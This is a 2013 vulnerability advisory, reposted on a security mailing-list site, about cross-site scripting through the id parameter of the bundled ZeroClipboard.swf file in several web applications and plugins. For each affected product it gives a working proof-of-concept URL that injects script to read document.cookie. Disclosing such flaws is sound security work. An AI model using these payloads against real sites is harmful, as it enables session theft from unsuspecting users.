Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  XSS vulnerabilities in ZeroClipboard

  XSS vulnerabilities in em-shorty, RepRapCalculator, Fulcrum, Django and aCMS

  PHP-Fusion 7.02.05 SQL Injection

  Reflective XSS in Marekkis Watermark-Plugin Cross-Site Scripting Vulnerability

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:24 февраля 2013 г.
Subject:XSS vulnerabilities in YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools for DataTables for jQuery


Hello 3APA3A!

These are Cross-Site Scripting vulnerabilities in YAML, MultiProject extension for Trac, UserCollections extension for Piwigo, TAO and TableTools plugin for DataTables plugin for jQuery (with ZeroClipboard.swf).

Earlier I've wrote about Cross-Site Scripting vulnerabilities in ZeroClipboard (http://seclists.org/fulldisclosure/2013/Feb/103). I wrote that this is very widespread flash-file and it's placed at tens of thousands of web sites. And it's used in hundreds of web applications. Among them are YAML, Multiproject for Trac, UserCollections for Piwigo, TAO and TableTools for DataTables for jQuery. And there are many other vulnerable web applications with ZeroClipboard.

-------------------------
Affected products:
-------------------------

Vulnerable are the next web applications with ZeroClipboard:

YAML 4.0.2 and previous versions.

Multiproject extension for Trac: Multiproject 1.4.21 and previous versions.

UserCollections extension for Piwigo.

TAO 2.3.1 and previous versions.

TableTools plugin for DataTables plugin for jQuery. Particularly it's bundled with InfoGlue 2.1 (and previous versions) and OGDI Field 6.x-1.0 (and previous versions) for Drupal.

Both XSS vulnerabilities in ZeroClipboard are fixed in latest version (by new developers), such as ZeroClipboard 1.1.7. All developers should update swf-file in their software.

----------
Details:
----------

Cross-Site Scripting (WASC-08):

XSS via id parameter and XSS via copying payload into buffer (as described in previous advisory).

YAML:

http://site/yaml/docs/assets/js/snippet/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

Multiproject extension for Trac:

http://site/themes/default/htdocs/flash/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

UserCollections extension for Piwigo:

http://site/piwigo/extensions/UserCollections/template/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

TAO:

http://site/filemanager/views/js/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

TableTools plugin for DataTables plugin for jQuery:

http://site/path/dataTables/extras/TableTools/media/swf/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

InfoGlue:

http:
//site/script/jqueryplugins/dataTables/extras/TableTools/media/swf/ZeroClipboard.
swf?id=\"))}catch(e){}if(!self.a)self.
a=!alert(document.cookie)//&width&height

OGDI Field for Drupal:

http:
//site/sites/all/modules/ogdi_field/plugins/dataTables/extras/TableTools/media/sw
f/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.
a)self.a=!alert(document.cookie)//&width&height

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород